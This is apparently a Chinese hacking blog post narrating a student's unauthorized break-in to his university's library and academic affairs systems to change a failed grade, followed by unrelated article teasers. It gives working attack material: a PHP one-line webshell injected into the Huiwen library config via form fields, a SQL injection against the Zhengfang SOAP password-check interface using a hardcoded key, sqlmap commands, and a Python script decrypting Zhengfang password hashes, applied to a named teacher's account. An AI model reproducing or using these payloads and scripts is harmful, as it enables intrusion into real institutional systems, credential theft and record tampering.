偷摸進教務系統一頓操作猛如虎 - 您已掛科

2021-02-14 暗網黑客

零基礎黑客教程,黑客圈新聞,安全面試經驗

盡在 # 暗網黑客 #

那真是一個悲傷的故事


我始終不明白我一個計網專業的學生為什麼要學電路。


有一個逃課特別多的孩子,老師給了60分,竟然過了。


我這邊53分掛科!


這我就不開心了~


呵呵。只做測試,不改成績


學校主站給教務查詢系統加了一個連結,但通過此處打開教務處,頁面全是靜態,不能很好的進行測試。


猜想在內網內可以,通過教務地址訪問。


於是轉移目標,先來從圖書館下手,等拿下圖書館,從圖書館代理過去搞。


圖書館乃開源的匯文圖書管理系統,敏感信息洩露,呵呵噠:

文件包含漏洞:

登入之後這邊可以看到當前連接的資料庫的一些信息:

至此我們可以隨意修改圖書管理系統的配置。


根據開原始碼分析,發現更新配置時代碼未做過濾


[AppleScript] 純文本查看 複製代碼

?

unction write_para( $strFileName, $strPara )

{

$fhandle = fopen( $strFileName, "wb" );

if ( $fhandle )

{

$strPara = "<?php\n".$strPara."\n?>";

if ( fwrite( $fhandle, $strPara ) )

{

fclose( $fhandle );

$strMsg = "數據修改成功。";

}

else

{

$strMsg = "數據修改失敗。";

}

}

else

{

$strMsg = "數據修改失敗。";

}

return $strMsg;

}


這樣我們可以再在配置文件裡插入任意內容,我們可以配置文件裡追加一句話;


在配置全文索引文件夾路徑時,修改

c:/hwopac/index/


c:/hwopac/index/";@eval($_POST['123']);//


更新過配置後,內容保存在的配置文件為:

/include/hwopacpwd.php


於是連接`URL+/include/hwopacpwd.php`即可得到一句話webshell。
下面兩個圖片是在烏雲看到的案例:


然而,我們學校圖書館的更新頁面卻是這樣:

握草,怎麼會這樣。那還真是個悲傷的故事。。。


猜想是運維人員在烏雲看到相關案例,刪除了該表單。


表單被刪,貌似無解。


後來抽根煙想了想,能不能去網上找一個一樣的系統,然後抓取修改那個修改的POST表單,google了一番,沒找到可以利用的。


於是想到自己在頁面構造添加表單,如下圖的文本輸入框:


審查元素插入如下標籤:

<dd><input size="20" name="fulltextPath" value="c:/hwopac/index/";@eval($_POST['123']);//" type="text"></dd



此處的表單name值是通過源碼審計看到的,案例中也有提現。


我們提交表單抓POST包,發現`fulltextPath`的值已經被提交:

測試連接`/include/hwopacpwd.php`,沒有連接上:


我們再來看下這個圖,仔細看,

你會發現其實不只是`fulltextPath`的值沒有被加密,`user`的值也沒有加密


同樣可以被替換,於是淫蕩的思路來了:


`POST`表單`user`值填寫為:

libsys";@eval($_POST['123']);//


提交之後,即可菜刀連接`/include/hwopacpwd.php`,GOOD JOB!

惡意代碼確實如此寫入:

提權略過,直接`SYSTEM`:

#黑客攻防實戰#靶場工具

每節課都附帶

合理合法用來實戰訓練入侵

模擬靶場和黑客工具課件附贈靶場工具

點開圖片 掃碼領取

教務系統部署在內網的某臺機器


為了防止外部攻擊,他們做了一個外部的接口,所有頁面靜態化,很是蛋疼


我使用上述圖書館的機器對內網的教務機器進行了一通掃描

終於找到了他的實際地址:

正方教務系統同樣提供了各類查詢接口


我此處利用`service.asmx`的`BMCheckPassword`接口的注入:
官方給出了如下規範的POST數據包:

[AppleScript] 純文本查看 複製代碼


POST /service.asmx HTTP/1.1

Host: [url]www.baidu.com[/url]

Content-Type: text/xml; charset=utf-8

Content-Length: 784

SOAPAction: "http://www.zf_webservice.com/BMCheckPassword"

<?xml version="1.0" encoding="utf-8"?>

<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://tempuri.org/" xmlns:types="http://tempuri.org/encodedTypes" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">

<soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">

<q1:BMCheckPassword xmlns:q1="http://www.zf_webservice.com/BMCheckPassword">

<strYHM xsi:type="xsd:string">string</strYHM>

<strPassword xsi:type="xsd:string">string</strPassword>

<xh xsi:type="xsd:string">string</xh>

<strKey xsi:type="xsd:string">KKKGZ2312</strKey>

</q1:BMCheckPassword>

</soap:Body>

</soap:Envelope>


上述`sKey = "KKKGZ2312"`為常量,有了`sKey`就可以去查詢一些接口了。
`strYHM`表示用戶名,我已經嚇哭,好像都是用拼音:


此處沒做過濾,直接構造語句使用Intruder模塊:

jwc01' and (SELECT SUBSTR(TO_CHAR(KL),1,1) from yhb where yhm='jwc01')='a



`payoad`為:`a-z`、`A-Z`、`0-9`、`~!@#$%^&*()_+[]{}\|<>:"';`



不知為何用BurpSuite跑起來很慢。。



我把POST數據包複製出來交給SQLMAP:

python sqlmap.py -r post.txt



GOOD JOB!

[14:31:40] [INFO] fetching tables for databases: 'CTXSYS, DBSNMP, DMSYS, EXFSYS, MDSYS, OLAPSYS, ORDSYS, OUTLN, SCOTT, SYS, SYSMAN, SYSTEM, TSMSYS, WMSYS, XDB, ZFXFZB'
[14:31:40] [INFO] the SQL query used returns 3389 entries


那麼問題來了,幾千個表,怎麼找教師用戶密碼的表?幸虧我拼音好:



我掛科的是電子電工,老師叫張X,姓名對應的欄位為XM,這拼音拼的啊。。。
這就好辦了,用`--sql-shell`查詢:

select * from "YHB" where XM = '張X';



恩~,得到密文為`U_rBKJ`,這是經過正方的特殊加密的,我們用python腳本解開:

[AppleScript] 純文本查看 複製代碼


# python

# coding=utf-8

import sys

def crack_zhengfang( pwdhash, key="Encrypt01" ):

len_passwd = len( pwdhash )

len_key = len( key )

pwdhash = pwdhash[: len_passwd/2][::-1] + pwdhash[len_passwd/2 :][::-1]

passwd = ''

Pos = 0

for i in xrange( len_passwd ):

Pos %= len_key

Pos += 1

strChar = pwdhash

KeyChar = key[Pos-1]

ord_strChar = ord( strChar )

ord_KeyChar = ord( KeyChar )

if not 32 <= ( ord_strChar ^ ord_KeyChar ) <= 126 or not 0 <= ord_strChar <= 255:

passwd += strChar

else:

passwd += chr( ord_strChar ^ ord_KeyChar )

return passwd

if __name__ == '__main__':

if len(sys.argv) != 2:

print "Usage: crackZF.py passwdhash"

sys.exit(1)

else:

print "Password:", crack_zhengfang( pwdhash=sys.argv[1], key="Encrypt01" )

promote pythonDemo v5est0r$ python zhengfang.py "U_rBKJ"
Password: 716822



`Password: 716822`
接著登入該老師的教務系統,錄入成績。。。

錄入成績需要密碼,密碼???

我根據官方給出的錄入成績密碼欄位沒查到密碼啊。。。空的也不行。



不急,慢慢來。
太悲傷了,補考估計也會掛掉,太悲傷了。



相關焦點

  • 小學生作文《糊裡糊塗一頓打》,老師看後大笑:這波操作猛如虎啊
    有的不喜歡給孩子的童年留下陰影的家長就會選擇給孩子講道理,有的暴脾氣的家長,二話不說,上來就是一頓混合雙打。這個方法簡單粗暴,行之有效。但是若干年後,孩子長大之後,還會記得自己小時候挨打的經歷,不得不說,是童年的陰影啊。
  • 怕掛科!大神教你修改教務系統上的成績,只需6步拿高分
    所以咱我們可千萬不能掛科02樂活君厚著臉皮,不惜出賣色相,死乞白咧的請教了團隊裡頭髮稀少且沉默寡言的技術小哥終於發現了學校教務系統的漏洞:通過幾步特殊的操作可以修改分數。今天樂活君特意為被期末考試折磨的寢食難安的同學們帶來了技術小哥獨創的:《修改教務系統成績教程》你只需要跟著下面的教程一步步做,利用學校教務系統的漏洞,就能把教務系統裡的成績修改到60分以上,甚至90以上的高分!
  • 潑水節一男子趁機猥褻婦女 朝臉猛潑偷摸胸
    潑水節一男子趁機猥褻婦女 朝臉猛潑偷摸胸 news.wehefei.com   發布時間:2014-04-17 16:32:09    來源:中國青年網
  • 一番操作猛如虎 一看收益排倒數!基金到底該怎麼投?
    摘要 【一番操作猛如虎 一看收益排倒數!基金到底該怎麼投?】今年以來公募基金再度取得高收益,多隻基金翻了倍,偏股型基金的年內平均收益率甚至接近50%。
  • 美術生用圓規畫圈圈,一頓操作猛如虎,畫出完美人像
    估計很多美術生都不喜歡上數學課,很多美術生估計都會有在數學課上畫畫走神的經歷,比如下面這位美術生在上幾何課的時候,竟然用圓規畫出了完美人像,可謂是一頓操作猛如虎。其實,這種操作就是印表機原理,一行行或者一圈圈軌跡在需要著色的地方著色就可以形成圖像。圓規不僅僅可以用來當作幾何圖形工具,在工程作圖中,畫按照既定的設計製圖,也大概是和這個美術生的操作類似。雖然美術生可能不太喜歡數學幾何課,但圓規對於美術生而言,拿來當成繪畫神器那真是信手拈來的事兒。
  • 又一行動支付巨頭誕生:一頓猛如虎的操作後,連支付寶也頂不住?
    當支付寶問世之後,確實很大程度上方便了眾多用戶,消費者可以通過支付寶就能完成轉帳等需要去銀行才能完成的操作,如今去銀行排隊的人開始變得越來越少,馬雲的這句話說得確實沒錯。但只不過話還沒有說全,這句話其實還有下半句,那就是:銀行一改變,支付寶就得慌!
  • 網友:一頓操作猛如虎,還是買個電動吧
    網友:一頓操作猛如虎,還是買個電動吧大家都知道,如果家裡面沒有電動打蛋器的話,打發蛋白是非常困難的,很多網友在這個時候都想出來用塑料瓶做一個打蛋器在製作的時候也很簡單,把塑料瓶第一剪掉,順著平身剪成一個個的小細條,寬度大概在一釐米左右,剪好之後直接放在大白裡開始打。
  • 熊孩子躺手術臺上玩手遊,一陣操作猛如虎連贏3局,醫生:奧利給
    熊孩子躺手術臺上玩手遊,一陣操作猛如虎連贏3局現在正值放暑假,爸爸媽媽就想趁這個時間爸爸媽媽就諮詢了一下醫生,在得到允許之後,兒子就拿著手機進了手術室。一陣操作猛如虎,熊孩子接連贏了好幾局遊戲。其實,對於孩子在手術臺上玩手機,醫生們也是比較贊同的,因為這樣孩子就不會太緊張,有利於他們手術的進行。不過這並不妨礙醫護人員吐槽這個熊孩子,當然也會默默送上一句「奧利給」。對此,網友們也發表了自己的評論。
  • 藍軒宇一頓分析猛如虎,看來禍害傳靈塔的重點是讓升靈臺永遠消失
    傳靈塔這個組織創建已久,曾經輝煌過也曾經衰敗過,但是經歷了那麼長時間還能堅持存在並富可敵國,其關鍵就在升靈臺。很多人認為,升靈臺的創造因為多位神級前輩以及無數頂級魂導器構成的,換句話說,就是靠著魂力加高科技不斷進化產生的。
  • 抖音6人9元吃垮海底撈, 一頓操作猛如虎, 最後只付182
    吃到三文魚、海膽、生蠔時,還另享服務員特殊服務,如:包餛飩、切生魚片、處理生蠔、榨果汁等等服務。作為服務小妹,一臉不知所措笑嘻嘻,心裡強忍滿足顧客所有要求。餐飲老闆想破腦袋去營銷,而總有那些不上當的主兒,盲目效仿視頻換來的卻是:這個安全責任我們付不起的!
  • 一拳超人:操縱天氣的鬼級怪人,一番猛如虎的操作,打醒了傑諾斯
    傑諾斯的失憶,讓想拉強大戰力進組的吹雪看到了希望。吹雪糾集了吹雪組,估計放出強大的能量波動,吸引傑諾斯感到指定場所。吹雪枉騙傑諾斯,他是自願加入吹雪組的一員,名為「炮灰傑諾斯」。傑諾斯估計從吹雪身上感覺到了惡意,直接逃走了。結果,在街上漫步的傑諾斯,恰巧遇到了一位大鬧的怪人。
  • COMPASS:為什麼你一頓操作猛如虎,最後還被瘋狂吐槽?
    在對局中,我們可能常常看到有人一頓操作猛如虎,最後啥也沒有,人沒殺掉,據點也丟了,這往往就是因為大家濫用了英雄技能。在#COMPASS中,每個英雄都有屬於自己的「英雄技能」,而且每個英雄技能都對整個戰局變化有著巨大的作用,這個相信大家都知道,不用我多說。
  • 寧可教子猛如虎,不可教子綿如羊
    最近朋友圈有這樣一句話火了,就是寧可教子猛如虎,不可教子綿如羊。現在社會競爭很激烈,父母怕孩子起點低,容易被淘汰,想法設法給孩子更好的。我認為,孩子不需要猛如虎,也不要綿如羊。因為猛如虎的話,會被人針對,別人不敢欺負你,但是也會想法在背後去除你。綿如羊的話,就會軟弱無能,別人不會高看你,更不會給你好的機遇。其實,還是要懂得分寸的,才能在社會上立足。
  • 每日一笑:一頓操作猛如虎,這後面應該接啥呢?
    6.裝杯失敗的全過程,一頓操作猛如虎,後面應該接啥呢?7.工作不為了錢,難道還能是為了理想?8.我單身,親戚們都催我找對象,每次見面就催。於是我就說:「她還沒有和她老公離婚,我想再等等。」親戚們沉默了一會兒後,紛紛開始勸我找對象別急。
  • 爸爸生病住院,熊孩子一頓操作猛如虎,爸爸「四腳朝天」笑翻網友
    爸爸正躺在病床上休息,兩個孩子一頓操作猛如虎,病床的前半部分被調到了最高,爸爸兩條腿被抬了起來,用「四腳朝天」來形容此時的爸爸再合適不過了。醫護人員見狀也有些忍俊不禁,網友們也展開了評論。檸檬不猛:熊孩子的力氣挺大啊,我搖這東西都感覺挺費力的。酷炫老阿姨:我還以為是特效呢,哈哈哈。後來的你們:孩他爸這是宮縮了嗎?這架勢有點猛啊。
  • 美術考試只剩10分鐘,考生一通操作猛如虎,老師:看來是皮癢了
    但是大家仔細觀察可以發現,只要不到考試最後的那半個小時,學生們往往都神情自若,寫答案的手更是絲毫不慌,仿佛一切竟在掌握,但是到了最後十分鐘沒寫完的話,那便是一通操作猛如虎了。實在是讓人啼笑皆非,考生們真是一通操作猛如虎,看了分數方知苦啊! 老師們紛紛表示:看來是皮癢了,學習不努力,考試鬼畫符!當下許多家長都希望自己的孩子多才多藝,便給孩子報許多興趣班,就算孩子表示對這些不感興趣也要強迫孩子,絲毫不問孩子的想法,也不看孩子是否有繪畫天賦是否適合學習美術。
  • 運勢全飄紅,3星座20號起財神光顧,財運猛如虎,買彩票中大獎!
    運勢全飄紅,3星座20號起財神光顧,財運猛如虎,買彩票中大獎!摩羯座的人天生素質聰明,八面玲瓏,靈活變通,眼光獨到,反應靈敏。從20日開始,他們鴻運當頭,財運如虎般猛,大財小財都能裝進口袋,工作單位發展迅速,接受高人指點,在工作中制定計劃,幫助他們走向人生巔峰,晉升和加薪的機會出現,賺錢順利!運勢全飄紅,3星座20號起財神光顧,財運猛如虎,買彩票中大獎!
  • 哈士奇熱得一直吐舌頭,主人思忖片刻後:果然一頓操作猛如虎
    這位主人看二哈這麼熱,思忖片刻後想了個辦法,於是就把二哈放進了冰箱裡替它降溫,果然「一頓操作猛如虎」,一看「戰績0-5」,這是多二的鏟屎官啊~要獸醫小明說,這麼二的鏟屎官可不多見,哪有這樣替自己主子降溫的,看來這是被二哈給同化了啊。
  • 大學生怎樣避免掛科,感覺要掛科怎麼辦,這些騷操作,建議你收藏
    不掛科的大學是不完整的大學,大學生反駁:騙人,你給我掛個試試,以及掛科後的後果,和防止掛科的一些正規操作,正規操作靠自己的努力不掛科,確實值得喝彩,但有時後往往還是會有同學不想熬夜複習,或者時間已經來不及複習了,那這裡老學長就來告訴你一些防止掛科的騷操作。
  • 護士給新生兒洗澡,一頓操作猛如虎,爸爸吐槽:比洗菜還隨意
    這天,李先生想跟護士學一學怎麼給寶寶洗澡,以免自己操作時傷害到孩子。原本以為她們會小心翼翼地給孩子清理,但看完了護士猛如虎的一頓操作之後,寶爸既心疼又無奈,實在忍不住便跟妻子吐槽:「我以為護士們給小寶寶洗澡都很溫柔,今天看了才知道,那個洗法比洗菜還隨意」。